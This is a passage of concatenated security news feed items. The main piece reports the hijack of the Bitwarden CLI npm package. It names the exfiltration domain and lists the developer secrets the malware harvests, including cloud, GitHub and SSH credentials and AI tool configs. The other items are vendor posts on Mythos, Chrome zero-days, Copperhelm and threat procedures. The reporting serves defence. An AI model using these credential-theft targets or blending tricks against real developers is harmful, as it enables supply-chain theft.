capabilities described reflect existing architecture applied to expected Mythos data structures. Deep Mythos integration is on D3’s roadmap.</p> </blockquote><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading">Related Resources</h2><ul class="wp-block-list"> <li><a href="https://d3security.com/resources/mythos-whitepaper/" type="d3-resource" id="61458">The Mythos Problem: 10,000 Zero-Days and the SOC That Can’t Keep Up</a></li> <li><a href="https://d3security.com/resources/mythos-nis2-eu-compliance/" type="d3-resource" id="61451">Mythos NIS2 Whitepaper</a></li> <li><a href="https://d3security.com/resources/nis2-compliance-for-the-ai-soc/" type="d3-resource" id="61311">NIS2 Compliance for the AI SOC</a></li> <li><a href="https://d3security.com/resources/mythos-eu-regulatory-comparison/" type="d3-resource" id="61474">EU Regulatory Comparison</a></li> <li><a href="https://d3security.com/solutions/autonomous-mythos-response/" type="page" id="61439">Autonomous Mythos Response</a></li> <li><a href="https://d3security.com/solutions/mythos-eu-ciso/" type="page" id="61441">Mythos Vulnerability Triage for EU CISOs</a></li> <li><a href="https://d3security.com/blog/nis2-soc-audit-readiness-2026/" type="post" id="61362">Belgium’s NIS2 Audit Window Opens April 18, 2026</a></li> <li><a href="https://d3security.com/faq/mythos-eu-compliance/" type="page" id="61521">EU FAQ</a></li> </ul><hr class="wp-block-separator has-alpha-channel-opacity"><p>The post <a href="https://d3security.com/blog/mythos-nis2-cra-dora-compliance/">When Mythos Finds Thousands of Zero-Days, EU Regulators Won’t Wait for Your SOC to Catch Up</a> appeared first on <a href="https://d3security.com/">D3 Security</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/when-mythos-finds-thousands-of-zero-days-eu-regulators-wont-wait-for-your-soc-to-catch-up/" data-a2a-title="When Mythos Finds Thousands of Zero-Days, EU Regulators Won’t Wait for Your SOC to Catch Up"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhen-mythos-finds-thousands-of-zero-days-eu-regulators-wont-wait-for-your-soc-to-catch-up%2F&amp;linkname=When%20Mythos%20Finds%20Thousands%20of%20Zero-Days%2C%20EU%20Regulators%20Won%E2%80%99t%20Wait%20for%20Your%20SOC%20to%20Catch%20Up" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhen-mythos-finds-thousands-of-zero-days-eu-regulators-wont-wait-for-your-soc-to-catch-up%2F&amp;linkname=When%20Mythos%20Finds%20Thousands%20of%20Zero-Days%2C%20EU%20Regulators%20Won%E2%80%99t%20Wait%20for%20Your%20SOC%20to%20Catch%20Up" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhen-mythos-finds-thousands-of-zero-days-eu-regulators-wont-wait-for-your-soc-to-catch-up%2F&amp;linkname=When%20Mythos%20Finds%20Thousands%20of%20Zero-Days%2C%20EU%20Regulators%20Won%E2%80%99t%20Wait%20for%20Your%20SOC%20to%20Catch%20Up" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhen-mythos-finds-thousands-of-zero-days-eu-regulators-wont-wait-for-your-soc-to-catch-up%2F&amp;linkname=When%20Mythos%20Finds%20Thousands%20of%20Zero-Days%2C%20EU%20Regulators%20Won%E2%80%99t%20Wait%20for%20Your%20SOC%20to%20Catch%20Up" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhen-mythos-finds-thousands-of-zero-days-eu-regulators-wont-wait-for-your-soc-to-catch-up%2F&amp;linkname=When%20Mythos%20Finds%20Thousands%20of%20Zero-Days%2C%20EU%20Regulators%20Won%E2%80%99t%20Wait%20for%20Your%20SOC%20to%20Catch%20Up" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://d3security.com/">D3 Security</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by D3 Security">D3 Security</a>. Read the original post at: <a href="https://d3security.com/blog/mythos-nis2-cra-dora-compliance/">https://d3security.com/blog/mythos-nis2-cra-dora-compliance/</a> </p>

<p>The command line interface (CLI) of the popular Bitwarden open source password manager is the latest target the ongoing Checkmarx supply chain campaign, with a threat group hijacking a npm package and injecting malicious code designed to steal sensitive data from developer workstations and CLI environments.</p><p>Threat researchers from a number of cybersecurity vendors, including Socket, Ox Security, JFrog Security, and StepSecurity detected and identified the compromised Bitwarden CLI version 2026.4.0, with the bad actors targeting it after <a href="https://socket.dev/blog/bitwarden-cli-compromised" target="_blank" rel="noopener">abused a GitHub Action</a> within Bitwarden’s CI/CD pipeline, according to the Socket Research Team.</p><p>The pattern was consistent that seen in other targeted repositories in the Checkmarx campaign, the researchers <a href="https://socket.dev/blog/bitwarden-cli-compromised" target="_blank" rel="noopener">wrote in a report</a>.</p><p>The attack also was another example of the increasing <a href="https://devops.com/critical-microsoft-github-flaw-highlights-dangers-to-ci-cd-pipelines-tenable/" target="_blank" rel="noopener">cybersecurity risks to CI/CD architectures</a> as they become more foundational in the software development pipeline and threat actors expand their targeting of them in such supply chain attacks.</p><h3>A Popular Password Manager</h3><p>The Bitwarden password manager is used by more than 10 million people and more than 50,000 business, they wrote, adding that it ranks among the <a href="https://ramp.com/vendors/bitwarden" target="_blank" rel="noopener">top three password managers</a> adopted by enterprises, they wrote, making it an attractive target for TeamPCP.</p><p>According to JFrog security researcher Meiter Palas, the package dropped by the attackers keeps the Bitwarden metadata intact but rewires the preinstall and the CLI to a custom loader rather than the legitimate one.</p><p>“The loader downloads the bun runtime from GitHub if it is not already present, then launches a large obfuscated JavaScript payload,” Palas <a href="https://research.jfrog.com/post/bitwarden-cli-hijack/" target="_blank" rel="noopener">wrote in a report</a>. “Once deobfuscated, that payload reveals a broad credential theft operation focused on developer workstations and CI environments: GitHub and npm tokens, SSH material, shell history, AWS [Amazon Web Services], GCP [Google Cloud Platform], and Azure secrets, GitHub Actions secrets, and AI tooling configuration files are all targeted.”</p><h3>Targeting AI Tools</h3><p>Sai Likhith, a software engineer with StepSecurity, <a href="https://www.stepsecurity.io/blog/bitwarden-cli-hijacked-on-npm-bun-staged-credential-stealer-targets-developers-github-actions-and-ai-tools" target="_blank" rel="noopener">wrote</a> that the Bitwarden case “is the first npm compromise we have analyzed that explicitly enumerates Claude Code, Cursor, Kiro, Codex CLI, and Aider, treating ~/.claude.json and MCP server configs as first class exfiltration targets alongside cloud and source control secrets.”</p><p>Stolen data is encrypted with AES-256-GCM and exfiltrated to audit.checkmarx.cx, a registered domain use to impersonate Checkmarx so that the outbound connection would blend in with security telemetry, making it more difficult for it to be detected, Likhith wrote. If a valid GitHub token was found, the malware weaponized so it would enumerate repositories, steal Actions secrets, and inject malicious workflows into the repositories the token could reach, “turning a single compromised developer machine into a broader supply chain pivot point,” he wrote.</p><h3>Bitwarden Shuts It Down</h3><p>Bitwarden <a href="https://community.bitwarden.com/t/bitwarden-statement-on-checkmarx-supply-chain-incident/96127" target="_blank" rel="noopener">acknowledged</a> the malicious package, saying its security team identified and contained it and that it was distributed for a little more than 90 minutes April 22, adding that the attack was in connection with the broader Checkmarx incident.</p><p>The company wrote that there was no evidence found to suggest that data in end users’ vaults were accessed or that production or production systems were compromised. Once detected, the compromised access was revoked, the malicious npm released deprecated, and remediation steps put into place.</p><p>The <a href="https://devops.com/sophisticated-supply-chain-attack-targeting-trivy-expands-to-checkmarx-litellm/" target="_blank" rel="noopener">ongoing supply chain campaign</a> has been underway for more than a month, with TeamPCP compromising <a href="https://www.aquasec.com/blog/trivy-supply-chain-attack-what-you-need-to-know/" target="_blank" rel="noopener">Aqua Security’s Trivy</a> open source security vulnerability scanner and associated GitHub Actions in March and then expanding later in the month to Checkmarx and LiteLLM.</p><h3>Attribution is Difficult</h3><p>Socket researchers saw overlaps – such as shared tools – in both the Checkmarx attack and the targeting of Bitwarden, adding that it “strongly suggests connection to the same malware ecosystem.” That said, attribution is complicated by differences in operational signatures. The attack on Checkmarx was claimed by TeamPCP on a particular social media account after it was discovered. In addition, the malware itself tried to blend in with seemingly legitimate connections, they wrote.</p><p>“This payload takes a different approach: the ideological branding is embedded directly in the malware, from the Shai-Hulud repository names to the ‘Butlerian Jihad’ manifesto payload to commit messages proclaiming resistance against machines,” Socket researchers wrote. “This suggests either a different operator using shared infrastructure, a splinter group with stronger ideological motivations, or an evolution in the campaign’s public posture.”</p><p>Ox Security researchers also <a href="https://www.ox.security/blog/shai-hulud-bitwarden-cli-supply-chain-attack/" target="_blank" rel="noopener">highlighted</a> the Shai-Hulud connection, noting that the string “Shai-Hulud: The Third Coming” was embedded in the Bitwarden package, writing that it indicates that “this is likely the next phase of the Shai-Hulud saga.”</p><p>The <a href="https://securityboulevard.com/2025/11/the-latest-shai-hulud-malware-is-faster-and-more-dangerous/" target="_blank" rel="noopener">self-propagating worm</a> emerged last year, running through npm repositories in information-stealing supply chain attacks late last year.</p><p>“Shai-Hulud is one of many supply chain attacks occurring in 2026, and this trend shows no signs of slowing as threat actors accumulate more credentials and compromise more developers,” the Ox Security researchers wrote. “Large-scale attacks through the NPM and PyPI registries could be avoided if stronger code review and guardrails were added during the package upload process. Failing to do so will only keep the door open for the next supply chain attack.”</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/bitwarden-cli-compromise-linked-to-ongoing-checkmarx-supply-chain-campaign/" data-a2a-title="Bitwarden CLI Compromise Linked to Ongoing Checkmarx Supply Chain Campaign"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fbitwarden-cli-compromise-linked-to-ongoing-checkmarx-supply-chain-campaign%2F&amp;linkname=Bitwarden%20CLI%20Compromise%20Linked%20to%20Ongoing%20Checkmarx%20Supply%20Chain%20Campaign" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fbitwarden-cli-compromise-linked-to-ongoing-checkmarx-supply-chain-campaign%2F&amp;linkname=Bitwarden%20CLI%20Compromise%20Linked%20to%20Ongoing%20Checkmarx%20Supply%20Chain%20Campaign" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fbitwarden-cli-compromise-linked-to-ongoing-checkmarx-supply-chain-campaign%2F&amp;linkname=Bitwarden%20CLI%20Compromise%20Linked%20to%20Ongoing%20Checkmarx%20Supply%20Chain%20Campaign" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fbitwarden-cli-compromise-linked-to-ongoing-checkmarx-supply-chain-campaign%2F&amp;linkname=Bitwarden%20CLI%20Compromise%20Linked%20to%20Ongoing%20Checkmarx%20Supply%20Chain%20Campaign" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fbitwarden-cli-compromise-linked-to-ongoing-checkmarx-supply-chain-campaign%2F&amp;linkname=Bitwarden%20CLI%20Compromise%20Linked%20to%20Ongoing%20Checkmarx%20Supply%20Chain%20Campaign" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<p>The post <a href="https://www.menlosecurity.com/blog/why-chrome-zero-days-keep-winning-and-what-enterprises-need-to-change">Why Chrome Zero-Days Keep Winning and What Enterprises Need to Change – Blog | Menlo Security</a> appeared first on <a href="https://www.menlosecurity.com">Menlo Security Blog</a>.</p><p>Fourth Chrome zero-day of 2026 exposes a bigger issue: patching is too slow. Learn why browser isolation is key to preventing modern attacks. </p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/why-chrome-zero-days-keep-winning-and-what-enterprises-need-to-change-blog-menlo-security/" data-a2a-title="Why Chrome Zero-Days Keep Winning and What Enterprises Need to Change – Blog | Menlo Security"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhy-chrome-zero-days-keep-winning-and-what-enterprises-need-to-change-blog-menlo-security%2F&amp;linkname=Why%20Chrome%20Zero-Days%20Keep%20Winning%20and%20What%20Enterprises%20Need%20to%20Change%20%E2%80%93%20Blog%20%7C%20Menlo%20Security" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhy-chrome-zero-days-keep-winning-and-what-enterprises-need-to-change-blog-menlo-security%2F&amp;linkname=Why%20Chrome%20Zero-Days%20Keep%20Winning%20and%20What%20Enterprises%20Need%20to%20Change%20%E2%80%93%20Blog%20%7C%20Menlo%20Security" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhy-chrome-zero-days-keep-winning-and-what-enterprises-need-to-change-blog-menlo-security%2F&amp;linkname=Why%20Chrome%20Zero-Days%20Keep%20Winning%20and%20What%20Enterprises%20Need%20to%20Change%20%E2%80%93%20Blog%20%7C%20Menlo%20Security" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhy-chrome-zero-days-keep-winning-and-what-enterprises-need-to-change-blog-menlo-security%2F&amp;linkname=Why%20Chrome%20Zero-Days%20Keep%20Winning%20and%20What%20Enterprises%20Need%20to%20Change%20%E2%80%93%20Blog%20%7C%20Menlo%20Security" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fwhy-chrome-zero-days-keep-winning-and-what-enterprises-need-to-change-blog-menlo-security%2F&amp;linkname=Why%20Chrome%20Zero-Days%20Keep%20Winning%20and%20What%20Enterprises%20Need%20to%20Change%20%E2%80%93%20Blog%20%7C%20Menlo%20Security" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.menlosecurity.com">Menlo Security Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Menlo Security Blog">Menlo Security Blog</a>. Read the original post at: <a href="https://www.menlosecurity.com/blog/why-chrome-zero-days-keep-winning-and-what-enterprises-need-to-change">https://www.menlosecurity.com/blog/why-chrome-zero-days-keep-winning-and-what-enterprises-need-to-change</a> </p>

<p>Copperhelm today emerged from stealth to launch a platform that aggregates cloud security data to enable its artificial intelligence (AI) agents to autonomously monitor cloud environments, investigate threats and automatically remediate issues in real-time.</p><p>Fresh off raising $7 million in funding, Copperhelm CEO Shimon Tolts said the company has developed a Context Lake that normalizes cloud security data in a way that enables AI agents to perform those tasks. The Copperhelm platform includes specialized AI agents that perform network analysis, analyze system behavior, simulate attacks and automatically mitigate issues. The Copperhelm agents connect directly to live workloads, inspect active processes and container images, map cloud network topology and deploy, for example, a web application firewall (WAF) if needed, without any downtime being required.</p><p>In general, cloud computing environments are highly complex and fragmented, making it difficult for AI tools to access and understand the context needed to ensure security is maintained. In organizations that have hundreds of cloud accounts, there needs to be a context engine that organizes all the metadata and configuration information that enables an AI agent to perform specific security tasks, said Tolts.</p><p>Armed with those insights, it then becomes possible to deploy a series of AI agents that collaboratively perform security functions spanning discovery to remediation, noted Tolts. That closed-loop approach makes it possible to manage cloud security at the level of scale that will be required to cope with the tsunami of vulnerabilities that will be discovered in the AI era, he added.</p><p>That tsunami is being driven first by AI coding tools that are generating more vulnerabilities faster than ever and more advanced AI models that are <a href="https://securityboulevard.com/2026/04/the-day-the-security-music-died/" target="_blank" rel="noopener">capable of discovering what are likely to become thousands of new zero-day vulnerabilities in existing legacy systems</a>. Once discovered, it now takes less than a day for cybercriminals using AI tools to create an exploit, noted Tolts.</p><p>While humans will still be needed to supervise AI agents, it’s not going to be feasible for cybersecurity teams to respond to issues that are occurring with greater frequency at machine speed. In effect, cybersecurity teams are now caught up in an AI arms race they can only win by investing more in AI to thwart cyberattacks that, thanks to AI, are only going to increase in volume and sophistication, said Tolts.</p><p>The challenge, of course, is explaining to business and IT leaders why the bulk of previous cybersecurity investments are rapidly becoming obsolete. While the total cost of cybersecurity might decline in the age of AI as more functions are automated, there is still going to be a need for an initial investment in new tools and platforms.</p><p>Hopefully, AI will benefit defenders more than attackers, but in the meantime, cybersecurity is in a state of flux. Unfortunately, it may yet require a few high-profile cyberattacks enabled by AI to occur before business leaders fully appreciate how the scope of threats facing the organization has fundamentally been forever changed.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/copperhelm-emerges-to-launch-autonomous-cloud-security-platform/" data-a2a-title="Copperhelm Emerges to Launch Autonomous Cloud Security Platform"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fcopperhelm-emerges-to-launch-autonomous-cloud-security-platform%2F&amp;linkname=Copperhelm%20Emerges%20to%20Launch%20Autonomous%20Cloud%20Security%20Platform" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fcopperhelm-emerges-to-launch-autonomous-cloud-security-platform%2F&amp;linkname=Copperhelm%20Emerges%20to%20Launch%20Autonomous%20Cloud%20Security%20Platform" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fcopperhelm-emerges-to-launch-autonomous-cloud-security-platform%2F&amp;linkname=Copperhelm%20Emerges%20to%20Launch%20Autonomous%20Cloud%20Security%20Platform" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fcopperhelm-emerges-to-launch-autonomous-cloud-security-platform%2F&amp;linkname=Copperhelm%20Emerges%20to%20Launch%20Autonomous%20Cloud%20Security%20Platform" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fcopperhelm-emerges-to-launch-autonomous-cloud-security-platform%2F&amp;linkname=Copperhelm%20Emerges%20to%20Launch%20Autonomous%20Cloud%20Security%20Platform" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<p>The post <a href="https://www.tidalcyber.com/blog/what-we-mean-by-procedures-and-why-precision-matters">What We Mean by Procedures (And Why Precision Matters)</a> appeared first on <a href="https://www.tidalcyber.com/blog">Tidal Cyber Blog</a>.</p><article class="blog-post" morss_own_score="10.0" morss_score="13.0"> <p><span id="hs_cos_wrapper_post_body" class="hs_cos_wrapper hs_cos_wrapper_meta_field hs_cos_wrapper_type_rich_text" style="" data-hs-cos-general-type="meta_field" data-hs-cos-type="rich_text" morss_own_score="5.0" morss_score="215.0"></span></p> <h2>Why Terminology Confusion Still Undermines Modern Defense</h2> <p><span>Cybersecurity discussions are filled with familiar language. Security teams talk about the latest threats and threat landscape, attack techniques and behavior, adversary tradecraft, and detection coverage. These terms appear constantly in threat intelligence reports, product documentation, and security strategy conversations.</span> </p> <p><span>Yet despite their frequent use, they are not always used precisely. In many cases, security teams use terms like “behavior,” “techniques,” and “procedures” interchangeably. This creates an important problem. When the language used to describe threats becomes imprecise, the defenses built to stop those threats can become imprecise as well.</span> </p> <p><span>At a top level, the majority of organizations know that their adversaries work in patterns. They are aware that attackers do reconnaissance, access, escalate privileges, laterally move, and steal data. Models like MITRE ATT&amp;CK have proven useful as a framework in structuring these ideas and offering a common taxonomy.</span> </p> <p><span>However, knowing that an adversary might perform “lateral movement” or “credential dumping” does not mean a security team understands how that activity actually unfolds in their actual environment. Techniques are abstract accounts of attacker behavior and can be helpful for categorization, but they do not necessarily lead to actionable defenses.</span> </p> <p><span>The difference between conceptual and operational threat understanding and defense is often reduced to a single element: procedural precision.</span> </p> <p><span>Procedures define how attacks are actually executed capturing the specific steps, tools, and sequences adversaries use. Without this detail, teams may know what attackers can do, but not how they do it in order to disrupt the attack.</span> </p> <h2><span>Techniques Describe Possibility. Procedures Describe Execution</span> </h2> <p><span>To explain why the procedures are important, it is useful to clarify the distinction among a few terms frequently used in cybersecurity.</span> </p> <p><span>“Adversary behavior” is a general term to describe how attackers operate across campaigns such as gaining access, escalating privileges, or maintaining persistence. Techniques provide a standardized way to represent that behavior, defining the common methods adversaries use to achieve objectives (e.g., spearphishing for initial access or token theft for credential abuse). These techniques help defenders consistently map threats to controls. </span> </p> <p><span>However, techniques describe what attackers do at an abstract level, not how they actually execute attacks in a real environment. That level of detail is captured in procedures, which define the step-by-step executions, tools, and sequences used by adversaries in the wild.</span> </p> <h4><strong><span>Procedures </span></strong><strong><span>operate at a different</span></strong><strong><span> level.</span></strong> </h4> <p><span>A procedure describes how an attack is actually carried out in practice. It captures specific commands, scripts, tools, and sequence of actions an adversary uses to execute a technique.</span> </p> <p><span>Consider the example of credential theft:</span></p> <p><span>A technique might define credential dumping as a method for extracting account credentials from memory. This helps defenders understand the type of activity that may occur.</span> </p> <p><span>A procedure, however, shows exactly how that activity is performed. It includes the specific tool used, the command syntax executed on a host, the privileges required, and the sequence of steps the attacker follows to achieve the outcome.</span> </p> <h4>The distinction is subtle but critical.</h4> <h4>Techniques describe the possibility of an attack.</h4> <h4><span>Procedures describe the reality of how that attack is executed.</span> </h4> <p><span>For defenders, that difference determines whether a control can truly detect or stop the activity in practice, not just in theory.</span> </p> <h2>Why Abstraction Breaks Down in Real Security Operations</h2> <p><span>Describing threats abstractly can be beneficial when it comes to organizing knowledge, but can be dangerous when relied upon as the primary basis for planning your cybersecurity defenses.</span> </p> <p><span>Many organizations build detection coverage around techniques. Security teams map their controls to techniques listed in security frameworks and assume that this mapping provides adequate defensive coverage.</span> </p> <p><span>In practice, this assumption often falls short. Techniques are abstract and can be executed in many different ways. The same objective can be achieved through multiple variations of executions, and a detection built for one approach may completely miss another. For example, an organization might deploy multiple detections designed to identify lateral movements. These designs might be configured to identify specific network events or authentication patterns commonly seen with a known attack path. However, the moment an adversary changes their sequence of commands, implements a different protocol, or employs a different toolset, they can bypass the designs.</span> </p> <p><span>From the perspective of a dashboard or coverage report, the organization appears well protected. Multiple detections exist for the relevant technique, and the security team has mapped its controls accordingly.</span> </p> <p><span>From the perspective of an adversary executing a real attack procedure, the environment may remain largely unmonitored.</span> </p> <p><span>This is one of the central challenges of abstraction in cybersecurity. Aligning defenses to generalized techniques instead of actual adversary procedures can make coverage appear stronger than it actually is.</span> </p> <p><span>Security teams may believe they have mitigated a threat, but in reality, they’ve only addressed a limited set of the procedures through which that threat can be carried out.</span> </p> <h2>Procedural Precision Changes How Defenses Are Prioritized</h2> <p><span>Procedural accuracy alters how organizations think about defensive priorities.</span> </p> <p><span>Without procedural insight, prioritization often becomes generic. Security teams attempt to cover as many techniques as possible across a wide range of potential threats. Resources are allocated broadly, and detection rules accumulate over time.</span> </p> <p><span>The result is frequently a large collection of controls that are difficult to evaluate and even harder to prioritize.</span> </p> <p><strong><span>A procedure-led approach shifts from abstra</span></strong><strong><span>ct possibilities to how attacks are executed in practice.</span></strong><span> By understanding the specific procedures adversaries use in real-world campaigns, especially those targeting similar industries, security teams can make more precise and informed defensive decisions. Instead of preparing for hypothetical scenarios, they can prioritize defenses against the way attacked are actually carried out. </span> </p> <p><span>That shift delivers several key advantages:</span> </p> <p><strong><span>First, it increases relevance.</span></strong><span> Defenses are aligned to observed adversary tradecraft, grounded in how attacks are executed in real environments, not theoretical scenarios.</span> </p> <p morss_own_score="7.0" morss_score="10.0"><strong><span>Second, it simplifies decision making. </span></strong><span>Rather than managing large volumes of generalized detections, teams can focus on the specific behaviors and execution patterns that matter most.</span> </p> <p morss_own_score="7.0" morss_score="10.5"><strong><span>Third, it improves the effectiveness of security investments.</span></strong><span> Rather than managing large volumes of generalized detections, teams can focus on the specific behaviors and execution patterns that matter most.</span> </p> <h4><span>Ultimately, procedural precision enables organizations to move from broad, generalized coverage to defenses that are intentionally aligned to how attacks actually happen.</span> </h4> <h2><span>From Threat Intelligence to Actionable Defensive Validation</span> </h2> <p><span>Threat intelligence plays an important role in modern security operations, but its value depends on how it is operationalized.</span> </p> <p><span>Adversary campaigns, techniques, and infrastructure that are used in attacks are usually described in threat reports. This information will assist organizations in understanding the evolving threat landscape and emerging threats.</span> </p> <p><span>Nevertheless, the intelligence kept at a conceptual level is hardly translated into defensive action. Procedures bridge the gap between threat intelligence and operational defense.</span> </p> <p><span>The procedural level of threat intelligence analysis enables the extraction of the actual steps adversaries follow to carry out attacks. These processes may then be applied to determine the ability of the available defenses to detect or prevent such actions.</span> </p> <p><span>Teams of security experts can simulate adversaries’ actions in controlled settings and observe how their surveillance measures respond. Detection logic can be evaluated against real execution patterns rather than theoretical threat models.</span> </p> <p><span>This type of validation provides far more meaningful feedback than technique-level mapping alone. It allows defenders to determine whether a control actually works against the tradecraft used by real attackers.</span> </p> <p><span>As a result, threat intelligence becomes procedure-led and evolves from a source of information into a driver of measurable defensive improvement.</span> </p> <h2>Measuring Security Outcomes Through Procedural Testing</h2> <p><span>The fact that procedural analysis helps to promote quantifiable security results is one of the greatest benefits of this methodology.</span> </p> <p><span>Conventional measures of security are activity oriented. Organizations quantify the number of alerts raised, controls implemented, or vulnerabilities repaired within a specific time frame. These are measures of operational effort, but not of defensive effectiveness.</span> </p> <p><span>Procedural testing leads to more evidence-based practice.</span> </p> <p><span>Organizations can assess their defenses against known adversary procedures to determine the effectiveness of their detection capabilities. Security teams can map defenses against procedures to determine whether they can defend against an attack or fail.</span> </p> <p><span>This produces metrics that directly relate to defensive capability.</span> </p> <p><span>For example, instead of reporting how many new controls were deployed in a quarter, a security team can report how many adversary procedures targeting their industry have been successfully detected and disrupted.</span> </p> <p><span>This kind of measurement shifts the discourse of cybersecurity performance. Security leaders can demonstrate the performance of defenses against real threats rather than abstract risk models.</span> </p> <p><span>The executives will have a better understanding of whether their security investments are performing and measure the reduction of attacker success and residual risk.</span> </p> <h2>Procedures as the Foundation of Threat-Led Defense</h2> <p><span>Adversaries are increasingly active and adaptive. Their campaigns evolve rapidly, adjusting to defensive controls as they encounter them. Defenses built on abstraction alone struggle to keep pace in this environment.</span> </p> <p><span>Techniques remain valuable for organizing knowledge and communicating threat categories. However, effective defense ultimately depends on understanding how those techniques are executed in real attacks. Procedures capture that execution. <span>They reveal the tools, commands, and sequences adversaries use to carry out attacks in practice.</span></span> </p> <p><span>When defenses are aligned to those procedures, organizations can assess their security posture against real-world attack patterns. Detection logic can be validated against concrete execution paths rather than theoretical assumptions.</span> </p> <p><span>This is the foundation of Threat-Led Defense. Instead of focusing solely on attack categories or abstract behaviors, defenses are grounded in the specific procedures adversaries use in practice.</span> </p> <p><span>For security teams, the shift is straightforward but powerful</span><span>:</span> </p> <p><strong><span>It means moving from knowing what adversaries might do to </span></strong><strong><span>prove</span></strong><strong><span> that defenses can stop what </span></strong><strong><span>they</span></strong><strong><span> actually do.</span></strong> </p> <p><span>In modern cybersecurity, that level of precision turns confidence from assumption into evidence.</span> </p> <h2>Conclusion</h2> <p>Tidal Cyber is the first true Threat-Led Defense platform built to flip the traditional defensive model by putting real adversary behavior at the center of your defense strategy.</p> <p>By mapping techniques, sub-techniques, and procedures to ATT&amp;CK, we reveal exactly where you’re exposed and how attackers actually operate. It’s a level of precision you’ve never had before, empowering your security team to proactively reduce risk and optimize high-impact security investments.</p> <p>Threat-Led Defense is Tidal Cyber’s unique implementation of Threat-Informed Defense, enhanced with procedure-level granularity to make CTI more relevant and actionable.</p> <p></p> </article><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content 